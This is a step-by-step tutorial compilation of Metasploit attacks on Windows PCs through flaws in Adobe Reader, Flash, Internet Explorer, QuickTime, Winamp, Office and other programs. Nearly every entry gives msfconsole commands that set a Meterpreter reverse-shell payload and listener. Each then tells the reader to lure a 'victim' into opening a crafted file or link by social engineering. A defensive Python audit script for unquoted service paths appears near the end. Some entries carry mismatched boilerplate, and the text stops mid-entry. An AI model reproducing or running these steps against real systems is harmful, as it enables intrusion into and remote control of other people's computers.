This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 "_error" response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the "World Uyghur Congress Invitation.doc" e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/browser/adobe_flash_rtmp

msf exploit(adobe_flash_rtmp) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_rtmp) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(adobe_flash_rtmp) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(adobe_flash_rtmp) > set uripath /               (the URL path to use for this exploit)
msf exploit(adobe_flash_rtmp) > exploit

Now give the victim the URL http://192.168.42.131:8080/ and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using the Adobe util.printf() Buffer Overflow :

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional earlier than 8.1.3. By creating a specially crafted PDF that contains a malformed util.printf() entry, an attacker may be able to execute arbitrary code. Unlike the browser modules above, this is a file-format module: Metasploit only writes the PDF, and a separate listener must be started to catch the connection.
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/fileformat/adobe_utilprintf

msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set lhost 192.168.42.131  (IP of the local host, where the payload connects back)
msf exploit(adobe_utilprintf) > set filename book.pdf
msf exploit(adobe_utilprintf) > exploit

After the malicious PDF has been generated it is stored on your local computer as /root/.msf4/local/book.pdf. Now set up a listener to handle the reverse connection the victim sends when the exploit executes:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit

The handler's payload, LHOST and LPORT must be identical to the values used when the PDF was generated (LPORT was left at its default, 4444, in both places), otherwise the connection from the victim goes nowhere.

Now send book.pdf to the victim; as soon as they download and open it in a vulnerable Reader you get a Meterpreter shell on the victim's computer. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using the Adobe Doc.media.newPlayer Use-After-Free Vulnerability :

This module exploits a use-after-free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2. Unlike the file-format modules in this paper, it serves the PDF from Metasploit's web server, so the victim's browser must hand PDFs to the Adobe Reader plugin.
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/browser/adobe_media_newplayer

msf exploit(adobe_media_newplayer) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_media_newplayer) > set lhost 192.168.42.131    (IP of the local host)
msf exploit(adobe_media_newplayer) > set srvhost 192.168.42.131  (must be an address on the local machine)
msf exploit(adobe_media_newplayer) > set uripath ad              (the URL path to use for this exploit)
msf exploit(adobe_media_newplayer) > exploit

Now give the victim the URL http://192.168.42.131:8080/ad and deliver it via any social-engineering technique. When the victim opens the link in their browser you get access to the victim's PC. Use sessions -l to list the sessions and sessions -i <number> to interact with one.

Attacking a Remote Windows PC using the Adobe Reader U3D Memory Corruption Vulnerability :

This module exploits a vulnerability in the U3D handling within versions 9.x through 9.4.6 and 10 through 10.1.1 of Adobe Reader. The vulnerability is due to the use of uninitialized memory. Arbitrary code execution is achieved by embedding specially crafted U3D data into a PDF document. A heap spray via JavaScript is used in order to ensure that the memory used by the invalid pointer is controlled.
Open a BackTrack terminal, type msfconsole, then enter the commands below:

use exploit/windows/fileformat/adobe_reader_u3d

msf exploit(adobe_reader_u3d) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_reader_u3d) > set lhost 192.168.42.131  (IP of the local host, where the payload connects back)
msf exploit(adobe_reader_u3d) > set filename learning.pdf
msf exploit(adobe_reader_u3d) > exploit

After we successfully generate the malicious PDF file, it will be stored on your local computer at /root/.msf4/local/learning.pdf. Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit


Now send your learning.pdf file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer. Use sessions -l and the session number to connect to the session.

Attacking On Remote Windows PC using Adobe PDF Escape EXE Social Engineering :
This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Msf exploit (adobe_pdf_embedded_exe_nojs)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_pdf_embedded_exe_nojs)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_pdf_embedded_exe_nojs)>set filename parse.pdf
Msf exploit (adobe_pdf_embedded_exe_nojs)>exploit

After we successfully generate the malicious PDF file, it will be stored on your local computer at /root/.msf4/local/parse.pdf. Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit


Now send your parse.pdf file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer. Use sessions -l and the session number to connect to the session.

Attacking On Remote Windows PC Using Adobe Acrobat Bundled LibTIFF Integer Overflow :
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/fileformat/adobe_libtiff

Msf exploit (adobe_libtiff)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_libtiff)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_libtiff)>set filename ebook.pdf
Msf exploit (adobe_libtiff)>exploit

After we successfully generate the malicious PDF file, it will be stored on your local computer at /root/.msf4/local/ebook.pdf. Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit

Now send your ebook.pdf file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer. Use sessions -l and the session number to connect to the session.

Attacking On Remote Windows PC Using Adobe Collab.collectEmailInfo() Buffer Overflow :
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1. By creating a specially crafted PDF that contains a malformed Collab.collectEmailInfo() call, an attacker may be able to execute arbitrary code.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/fileformat/adobe_collectemailinfo

Msf exploit (adobe_collectemailinfo)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_collectemailinfo)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_collectemailinfo)>set filename math.pdf
Msf exploit (adobe_collectemailinfo)>exploit

After we successfully generate the malicious PDF file, it will be stored on your local computer at /root/.msf4/local/math.pdf. Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit

Now send your math.pdf file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer. Use sessions -l and the session number to connect to the session.

Attacking On Remote Windows PC Using Adobe CoolType SING Table uniqueName Stack Buffer Overflow :
This module exploits a vulnerability in the Smart Independent Glyphlets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/browser/adobe_cooltype_sing

Msf exploit (adobe_cooltype_sing)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_cooltype_sing)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_cooltype_sing)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (adobe_cooltype_sing)>set uripath fr (The URL to use for this exploit)
Msf exploit (adobe_cooltype_sing)>exploit

Now the URL you should give to your victim is http://192.168.42.131:8080/fr . Send the link of the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC. Use sessions -l and the session number to connect to the session.

Attacking On Remote Windows PC Using Adobe JBIG2Decode Heap Corruption Exploit :
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/browser/adobe_jbig2decode

Msf exploit (adobe_jbig2decode)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_jbig2decode)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (adobe_jbig2decode)>set uripath beniimage (The URL to use for this exploit)
Msf exploit (adobe_jbig2decode)>exploit

Now the URL you should give to your victim is http://192.168.42.131:8080/beniimage . Send the link of the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.
Use sessions -l and the session number to connect to the session.


Attacking On Remote Windows PC Using Adobe Collab.getIcon() Buffer Overflow :
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted PDF that contains a malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/browser/adobe_geticon

Msf exploit (adobe_geticon)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_geticon)>show options
Msf exploit (adobe_geticon)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_geticon)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (adobe_geticon)>set uripath adb (The URL to use for this exploit)
Msf exploit (adobe_geticon)>exploit

Now the URL you should give to your victim is http://192.168.42.131:8080/adb . Send the link of the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.
Use sessions -l and the session number to connect to the session.


Attacking On Remote Windows PC Using Microsoft Internet Explorer execCommand Use-After-Free Vulnerability :
This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/browser/ie_execcommand_uaf

msf exploit (ie_execcommand_uaf)>set payload windows/meterpreter/reverse_tcp
msf exploit (ie_execcommand_uaf)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (ie_execcommand_uaf)>set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit (ie_execcommand_uaf)>set uripath ie (The URL to use for this exploit)
msf exploit (ie_execcommand_uaf)>exploit

Now the URL you should give to your victim is http://192.168.42.131:8080/ie . Send the link of the server to the victim via any social engineering technique.

When the victim opens that link in their browser, you get access to the victim's PC.
Use sessions -l and the session number to connect to the session.


Attacking On Remote Windows PC Using Internet Explorer COM CreateObject Code Execution :
This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/browser/ie_createobject

Msf exploit (ie_createobject)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ie_createobject)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ie_createobject)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (ie_createobject)>set uripath ie (The URL to use for this exploit)
Msf exploit (ie_createobject)>exploit

Now the URL you should give to your victim is http://192.168.42.131:8080/ie . Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC. Use sessions -l and the session number to connect to the session.


Attacking On Remote Windows PC Using Internet Explorer WebViewFolderIcon setSlice() Overflow :
This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. This flaw was published during the Month of Browser Bugs project.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/browser/ms06_057_webview_setslice

Msf exploit (ms06_057_webview_setslice)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms06_057_webview_setslice)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ms06_057_webview_setslice)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (ms06_057_webview_setslice)>set uripath ie (The URL to use for this exploit)
Msf exploit (ms06_057_webview_setslice)>exploit

Now the URL you should give to your victim is http://192.168.42.131:8080/ie . Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC. Use sessions -l and the session number to connect to the session.


Attacking On Remote Windows PC Using Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability :
This module exploits a heap overflow vulnerability in the KeyFrame method of the Direct Animation ActiveX control. This is a port of the exploit implemented by Alexander Sotirov.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/browser/ms06_067_keyframe

Msf exploit (ms06_067_keyframe)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms06_067_keyframe)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ms06_067_keyframe)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (ms06_067_keyframe)>set uripath ie (The URL to use for this exploit)
Msf exploit (ms06_067_keyframe)>exploit

Now the URL you should give to your victim is http://192.168.42.131:8080/ie . Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC. Use sessions -l and the session number to connect to the session.


Attacking On Remote Windows PC Using Internet Explorer createTextRange() Code Execution :
This module exploits a code execution vulnerability in Microsoft Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point to a very remote, non-existent memory location. This module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. This vulnerability was independently discovered by multiple parties. The heap spray method used by this exploit was pioneered by Skylined.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/browser/ms06_013_createtextrange

Msf exploit (ms06_013_createtextrange)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms06_013_createtextrange)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ms06_013_createtextrange)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (ms06_013_createtextrange)>set uripath ie (The URL to use for this exploit)
Msf exploit (ms06_013_createtextrange)>exploit

Now the URL you should give to your victim is http://192.168.42.131:8080/ie . Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC. Use sessions -l and the session number to connect to the session.


Attacking On Remote Windows PC Using MS11_003 Internet Explorer Exploit :
This module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 mscorie.dll module to bypass DEP and ASLR. This module does not opt in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/browser/ms11_003_ie_css_import

Msf exploit (ms11_003_ie_css_import)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms11_003_ie_css_import)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (ms11_003_ie_css_import)>set srvport 80 (The local port to listen on, default: 8080)
Msf exploit (ms11_003_ie_css_import)>set uripath hack.flv (The URL to use for this exploit)
Msf exploit (ms11_003_ie_css_import)>set lhost 192.168.1.4 (IP of Local Host)
Msf exploit (ms11_003_ie_css_import)>exploit

Now the URL you should give to your victim is http://192.168.42.131:80/hack.flv . Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC. Use sessions -l and the session number to connect to the session.


Attacking On Remote Windows PC in LAN using Internet Explorer DHTML Behaviors :
This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in the wild and was previously known as the "iepeers" vulnerability. The name comes from Microsoft's suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, "The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object." NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/browser/ms10_018_ie_behaviors

Msf exploit (ms10_018_ie_behaviors)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_018_ie_behaviors)>set lhost 192.168.42.31 (IP of Local Host)
Msf exploit (ms10_018_ie_behaviors)>set srvhost 192.168.42.31 (This must be an address on the local machine)
Msf exploit (ms10_018_ie_behaviors)>set uripath ie (The URL to use for this exploit)
Msf exploit (ms10_018_ie_behaviors)>exploit

Now the URL you should give to your victim is http://192.168.42.131:80/ie . Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC. Use sessions -l and the session number to connect to the session.

Attacking On Remote Windows XP PC using Internet Explorer Winhlp32.exe MsgBox Code Execution :
This module exploits a code execution vulnerability that occurs when a user presses F1 on a Message Box originated from VBScript within a web page. When the user hits F1, the Message Box help functionality will attempt to load and use a HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server. This particular version of the exploit implements a WebDAV server that will serve the HLP file as well as a payload EXE. During testing, warnings about the payload EXE being unsigned were witnessed. A future version of this module might use other methods that do not create such a warning.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32

Msf exploit (ms10_022_ie_vbscript_winhlp32)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_022_ie_vbscript_winhlp32)>set lhost 192.168.42.31 (IP of Local Host)
Msf exploit (ms10_022_ie_vbscript_winhlp32)>set srvhost 192.168.42.31 (This must be an address on the local machine)
Msf exploit (ms10_022_ie_vbscript_winhlp32)>set uripath / (The URL to use for this exploit)
Msf exploit (ms10_022_ie_vbscript_winhlp32)>exploit

Now the URL you should give to your victim is http://192.168.42.131 . Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC. Use sessions -l and the session number to connect to the session.


Attacking On Remote Windows PC using Internet Explorer CSS SetUserClip Memory Corruption Exploit :
This module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead to arbitrary code execution. It seems like Microsoft code inadvertently increments a vtable pointer to point to an unaligned address within the vtable's function pointers. This leads to the program counter being set to the address determined by the address "*vtable+0x30+1". The particular address depends on the exact version of the mshtml library in use. Since the address depends on the version of mshtml, some versions may not be exploitable. Specifically, those ending up with a program counter value within another module, in kernel space, or just not able to be reached with various memory spraying techniques. Also, since the address is not controllable, it is unlikely to be possible to use ROP to bypass non-executable memory protections.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/browser/ms10_090_ie_css_clip

Msf exploit (ms10_090_ie_css_clip)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_090_ie_css_clip)>set lhost 192.168.42.31 (IP of Local Host)
Msf exploit (ms10_090_ie_css_clip)>set srvhost 192.168.42.31 (This must be an address on the local machine)
Msf exploit (ms10_090_ie_css_clip)>set uripath clips (The URL to use for this exploit)
Msf exploit (ms10_090_ie_css_clip)>exploit

Now the URL you should give to your victim is http://192.168.42.131:8080/clips . Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC. Use sessions -l and the session number to connect to the session.


Attacking On Remote Windows PC Using Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption :
This module exploits an error related to the CFunctionPointer function when attempting to access uninitialized memory. A remote attacker could exploit this vulnerability to corrupt memory and execute arbitrary code on the system with the privileges of the victim.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/browser/ms09_002_memory_corruption

Msf exploit (ms09_002_memory_corruption)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms09_002_memory_corruption)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ms09_002_memory_corruption)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (ms09_002_memory_corruption)>set uripath ie (The URL to use for this exploit)
Msf exploit (ms09_002_memory_corruption)>exploit

Now the URL you should give to your victim is http://192.168.42.131:80/ie . Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC. Use sessions -l and the session number to connect to the session.


Attacking On Remote Windows PC Using Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow :
This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, such as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be used to overflow, so at the moment a DEP/ASLR bypass hasn't been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/browser/apple_quicktime_texml_font_table

msf exploit (apple_quicktime_texml_font_table)>set payload windows/meterpreter/reverse_tcp
msf exploit (apple_quicktime_texml_font_table)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (apple_quicktime_texml_font_table)>set srvhost 192.168.42.131 (This must be an address on the local machine)
msf exploit (apple_quicktime_texml_font_table)>set uripath / (The URL to use for this exploit)
msf exploit (apple_quicktime_texml_font_table)>exploit

Now the URL you should give to your victim is http://192.168.42.131:8080/ . Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC. Use sessions -l and the session number to connect to the session.

Attacking On Remote Windows PC Using gAlan 0.2.1 Buffer Overflow :
This module exploits a stack buffer overflow in gAlan 0.2.1 by creating a specially crafted galan file.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/fileformat/galan_fileformat_bof

msf exploit (galan_fileformat_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (galan_fileformat_bof)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (galan_fileformat_bof)>exploit

After we successfully generate the malicious galan file, it will be stored on your local computer at /root/.msf4/local/msf.galan. Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit

Now send your msf.galan file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer.


Attacking On Remote Windows PC Using Orbit Downloader URL Unicode Conversion Overflow :
This module exploits a stack-based buffer overflow in Orbit Downloader. The vulnerability is due to Orbit converting a URL ASCII string to Unicode in an insecure way with MultiByteToWideChar. The vulnerability is exploited with a specially crafted metalink file that should be opened with Orbit through the File->Add Metalink option.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/fileformat/orbit_download_failed_bof

msf exploit (orbit_download_failed_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (orbit_download_failed_bof)>set lhost 192.168.1.4 (IP of Local Host)
msf exploit (orbit_download_failed_bof)>exploit

After we successfully generate the malicious metalink file, it will be stored on your local computer at /root/.msf4/local/msf.metalink. Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit

Now send your msf.metalink file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer.


Attacking On Remote Windows PC Using OpenVPN Trusted Path Privilege Escalation :
This module exploits a logic flaw due to how the lpApplicationName parameter is handled. When the lpApplicationName contains a space, the file name is ambiguous. Take this file path as an example: C:\program files\hello.exe; the Windows API will try to interpret this as two possible paths, C:\program.exe and C:\program files\hello.exe, and then execute all of them. To some software developers this is unexpected behavior, which becomes a security problem if an attacker is able to place a malicious executable in one of these unexpected paths, and sometimes escalates privileges if run as SYSTEM. Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the same problem. The offensive technique is also described in Writing Secure Code (2nd Edition), Chapter 23, in the section "Calling Processes Securely" on page 676.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/local/trusted_service_path

msf exploit (trusted_service_path)>set payload windows/meterpreter/reverse_tcp
msf exploit (trusted_service_path)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (trusted_service_path)>set lport 4443 (Port of the local machine)
msf exploit (trusted_service_path)>set session 1
msf exploit (trusted_service_path)>exploit

Now the URL you should give to your victim is http://192.168.42.131 . Send the link of the server to the victim via any social engineering technique. When the victim opens that link in their browser, you get access to the victim's PC. Use sessions -l and the session number to connect to the session.
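The ambiguous file-name handling described above is also something a defender can audit for before it is exploited. The script below is an added example, not part of the original tutorial or of the Metasploit module: given a service's unquoted ImagePath it enumerates every executable name Windows would look for before the intended one (C:\program.exe for C:\program files\hello.exe) and flags those whose directory is writable by ordinary users. The service list and the set of writable directories are constructed sample data standing in for a registry read and a real ACL check.

```python
r"""Audit Windows service command lines for the unquoted-path ambiguity.

Added example (not from the tutorial or from Metasploit). For an unquoted path such
as  C:\Program Files\hello.exe  Windows first looks for  C:\Program.exe ; this code
lists those pre-empted names and reports the ones sitting in user-writable folders.
"""
import ntpath
from typing import Dict, List, Set, Tuple

# Constructed sample: service name -> ImagePath as it would appear under
# HKLM\SYSTEM\CurrentControlSet\Services\<name>. Not taken from a real host.
SAMPLE_SERVICES: Dict[str, str] = {
    "OpenVPNService": r"C:\Program Files\OpenVPN\bin\openvpnserv.exe",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "QuotedSvc": r'"C:\Program Files\Vendor App\svc.exe" -run',
    "ThirdParty": r"C:\Program Files (x86)\Some Vendor\Tool Suite\agent.exe /service",
}

# Constructed sample: directories assumed to grant write access to ordinary users.
# A real audit would read each directory's ACL instead of using a fixed set.
SAMPLE_WRITABLE_DIRS: Set[str] = {r"C:\Program Files (x86)\Some Vendor"}


def split_command(cmd: str) -> Tuple[str, str, bool]:
    """Return (image_path, arguments, quoted) for a service command line.

    A quoted command line is unambiguous: the image path is the quoted part.
    For an unquoted one, whitespace tokens are joined until one ends in ".exe";
    the remaining tokens are arguments. With no ".exe" token the whole line is
    treated as the image path.
    """
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        if end == -1:
            return cmd[1:], "", True
        return cmd[1:end], cmd[end + 1:].strip(), True
    tokens = cmd.split()
    for i, tok in enumerate(tokens):
        if tok.lower().endswith(".exe"):
            return " ".join(tokens[: i + 1]), " ".join(tokens[i + 1:]), False
    return cmd, "", False


def hijack_candidates(image_path: str) -> List[str]:
    """Executables Windows tries *before* the intended one for an unquoted path.

    CreateProcess takes the text up to the first space as the module name and,
    when that file does not exist, extends it to the next space and retries.
    A name without an extension gets ".exe" appended. The intended path itself
    is excluded, so every returned entry is a location that must not be
    writable by untrusted users.
    """
    candidates: List[str] = []
    for idx, ch in enumerate(image_path):
        if ch != " ":
            continue
        prefix = image_path[:idx]
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def audit_services(services: Dict[str, str], writable_dirs: Set[str]) -> Dict[str, List[str]]:
    """Map each service to the hijack candidates that live in a user-writable directory.

    Quoted paths and paths without spaces produce no entry. Directory names are
    compared case-insensitively with trailing backslashes ignored.
    """
    norm = {d.lower().rstrip("\\") for d in writable_dirs}
    findings: Dict[str, List[str]] = {}
    for name, cmd in services.items():
        image_path, _args, quoted = split_command(cmd)
        if quoted:
            continue
        risky = [c for c in hijack_candidates(image_path)
                 if ntpath.dirname(c).lower().rstrip("\\") in norm]
        if risky:
            findings[name] = risky
    return findings


def remediated_command(cmd: str) -> str:
    """Return the command line with the image path quoted, which removes the ambiguity."""
    image_path, args, quoted = split_command(cmd)
    if quoted:
        return cmd.strip()
    fixed = f'"{image_path}"'
    return f"{fixed} {args}" if args else fixed


if __name__ == "__main__":
    for svc, paths in audit_services(SAMPLE_SERVICES, SAMPLE_WRITABLE_DIRS).items():
        print(f"[!] {svc}: pre-empted names in writable folders: {paths}")
        print(f"    quoted ImagePath: {remediated_command(SAMPLE_SERVICES[svc])}")
```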

Attacking On Remote Windows PC Using Winamp MAKI Buffer Overflow :
This module exploits a stack-based buffer overflow in Winamp 5.55. The flaw exists in gen_ff.dll and occurs while parsing a specially crafted MAKI file, where memmove is used in an insecure way with user-controlled data. To exploit the vulnerability the attacker must convince the target user to install the generated mcvcore.maki file in the scripts directory of the default Bento skin, or generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/fileformat/winamp_maki_bof

msf exploit (winamp_maki_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (winamp_maki_bof)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (winamp_maki_bof)>exploit

After we successfully generate the malicious MAKI file, it will be stored on your local computer at /root/.msf4/local/mcvcore.maki. Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit is successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit

Now send your mcvcore.maki file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer.

Attacking On Remote Windows PC Using Microsoft Office Word MS12-027 MSCOMCTL ActiveX Buffer Overflow :
This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild in April 2012. This module targets Office 2007 and Office 2010. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses msgr3en.dll, which will load after Office is loaded, so the malicious file must be loaded through File / Open to achieve exploitation.
Open backtrack terminal, type msfconsole, then type the command below: use exploit/windows/fileformat/ms12_027_mscomctl_bof
